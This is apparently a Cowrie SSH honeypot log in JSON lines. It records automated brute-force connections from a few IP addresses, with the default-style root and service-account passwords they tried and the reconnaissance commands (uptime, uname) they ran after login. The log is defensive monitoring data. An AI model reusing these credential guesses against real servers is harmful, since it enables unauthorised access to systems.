{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:20:40.506184Z","src_ip":"212.227.125.160","session":"ea48e117f8c7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:20:40.726958Z","src_ip":"212.227.125.160","session":"ea48e117f8c7"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache123","message":"login attempt [apache/apache123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:20:41.376411Z","src_ip":"212.227.125.160","session":"ea48e117f8c7"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:20:42.594783Z","src_ip":"212.227.125.160","session":"ea48e117f8c7"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":24334,"dst_ip":"1.2.3.4","dst_port":22,"session":"93e89688e9ee","protocol":"ssh","message":"New connection: 186.225.142.90:24334 (1.2.3.4:22) [session: 93e89688e9ee]","sensor":"my-vps","timestamp":"2025-08-28T06:20:45.753180Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:20:46.100508Z","src_ip":"186.225.142.90","session":"93e89688e9ee"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:20:46.771254Z","src_ip":"186.225.142.90","session":"93e89688e9ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59972,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bb0005fce0e","protocol":"ssh","message":"New connection: 212.227.235.229:59972 (1.2.3.4:22) [session: 0bb0005fce0e]","sensor":"my-vps","timestamp":"2025-08-28T06:20:47.105482Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:20:47.106497Z","src_ip":"212.227.235.229","session":"0bb0005fce0e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:20:47.359660Z","src_ip":"212.227.235.229","session":"0bb0005fce0e"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache123","message":"login attempt [apache/apache123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:20:48.121599Z","src_ip":"212.227.235.229","session":"0bb0005fce0e"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:20:49.376407Z","src_ip":"212.227.235.229","session":"0bb0005fce0e"}
{"eventid":"cowrie.login.success","username":"root","password":"0899400729%$","message":"login attempt [root/0899400729%$] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:20:51.789953Z","src_ip":"186.225.142.90","session":"93e89688e9ee"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:20:53.587213Z","src_ip":"186.225.142.90","session":"93e89688e9ee"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-28T06:20:53.587946Z","src_ip":"186.225.142.90","session":"93e89688e9ee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:20:53.872315Z","src_ip":"186.225.142.90","session":"93e89688e9ee"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:20:53.944044Z","src_ip":"186.225.142.90","session":"93e89688e9ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37674,"dst_ip":"1.2.3.4","dst_port":22,"session":"f49379196b80","protocol":"ssh","message":"New connection: 212.227.125.160:37674 (1.2.3.4:22) [session: f49379196b80]","sensor":"my-vps","timestamp":"2025-08-28T06:20:56.972091Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:20:56.974052Z","src_ip":"212.227.125.160","session":"f49379196b80"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:20:57.211276Z","src_ip":"212.227.125.160","session":"f49379196b80"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd","message":"login attempt [root/P@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:20:57.886606Z","src_ip":"212.227.125.160","session":"f49379196b80"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:20:58.353081Z","src_ip":"212.227.125.160","session":"f49379196b80"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:20:58.353793Z","src_ip":"212.227.125.160","session":"f49379196b80"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:20:58.579342Z","src_ip":"212.227.125.160","session":"f49379196b80"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:20:58.580405Z","src_ip":"212.227.125.160","session":"f49379196b80"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37710,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd879c69c4cb","protocol":"ssh","message":"New connection: 212.227.235.229:37710 (1.2.3.4:22) [session: fd879c69c4cb]","sensor":"my-vps","timestamp":"2025-08-28T06:21:03.632292Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:21:03.633526Z","src_ip":"212.227.235.229","session":"fd879c69c4cb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:21:03.900964Z","src_ip":"212.227.235.229","session":"fd879c69c4cb"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd","message":"login attempt [root/P@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:21:05.015019Z","src_ip":"212.227.235.229","session":"fd879c69c4cb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:21:05.644673Z","src_ip":"212.227.235.229","session":"fd879c69c4cb"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:21:05.645342Z","src_ip":"212.227.235.229","session":"fd879c69c4cb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:21:05.913898Z","src_ip":"212.227.235.229","session":"fd879c69c4cb"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:21:05.915012Z","src_ip":"212.227.235.229","session":"fd879c69c4cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49260,"dst_ip":"1.2.3.4","dst_port":22,"session":"42573314cb08","protocol":"ssh","message":"New connection: 212.227.125.160:49260 (1.2.3.4:22) [session: 42573314cb08]","sensor":"my-vps","timestamp":"2025-08-28T06:21:13.544193Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:21:13.548599Z","src_ip":"212.227.125.160","session":"42573314cb08"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:21:13.773077Z","src_ip":"212.227.125.160","session":"42573314cb08"}
{"eventid":"cowrie.login.success","username":"root","password":"!qaz@WSX","message":"login attempt [root/!qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:21:14.662539Z","src_ip":"212.227.125.160","session":"42573314cb08"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:21:15.214881Z","src_ip":"212.227.125.160","session":"42573314cb08"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:21:15.215598Z","src_ip":"212.227.125.160","session":"42573314cb08"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:21:15.440163Z","src_ip":"212.227.125.160","session":"42573314cb08"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:21:15.441379Z","src_ip":"212.227.125.160","session":"42573314cb08"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36134,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb1ae4863fc5","protocol":"ssh","message":"New connection: 212.227.235.229:36134 (1.2.3.4:22) [session: fb1ae4863fc5]","sensor":"my-vps","timestamp":"2025-08-28T06:21:20.119689Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:21:20.120597Z","src_ip":"212.227.235.229","session":"fb1ae4863fc5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:21:20.367619Z","src_ip":"212.227.235.229","session":"fb1ae4863fc5"}
{"eventid":"cowrie.login.success","username":"root","password":"!qaz@WSX","message":"login attempt [root/!qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:21:21.117731Z","src_ip":"212.227.235.229","session":"fb1ae4863fc5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:21:21.631452Z","src_ip":"212.227.235.229","session":"fb1ae4863fc5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:21:21.632187Z","src_ip":"212.227.235.229","session":"fb1ae4863fc5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:21:21.880629Z","src_ip":"212.227.235.229","session":"fb1ae4863fc5"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:21:21.881738Z","src_ip":"212.227.235.229","session":"fb1ae4863fc5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58756,"dst_ip":"1.2.3.4","dst_port":22,"session":"8182b263725f","protocol":"ssh","message":"New connection: 212.227.125.160:58756 (1.2.3.4:22) [session: 8182b263725f]","sensor":"my-vps","timestamp":"2025-08-28T06:21:30.132392Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:21:30.141801Z","src_ip":"212.227.125.160","session":"8182b263725f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:21:30.352691Z","src_ip":"212.227.125.160","session":"8182b263725f"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-28T06:21:31.224155Z","src_ip":"212.227.125.160","session":"8182b263725f"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:21:32.444528Z","src_ip":"212.227.125.160","session":"8182b263725f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42232,"dst_ip":"1.2.3.4","dst_port":22,"session":"f27e7e3d5a95","protocol":"ssh","message":"New connection: 212.227.235.229:42232 (1.2.3.4:22) [session: f27e7e3d5a95]","sensor":"my-vps","timestamp":"2025-08-28T06:21:36.792311Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:21:36.793059Z","src_ip":"212.227.235.229","session":"f27e7e3d5a95"}
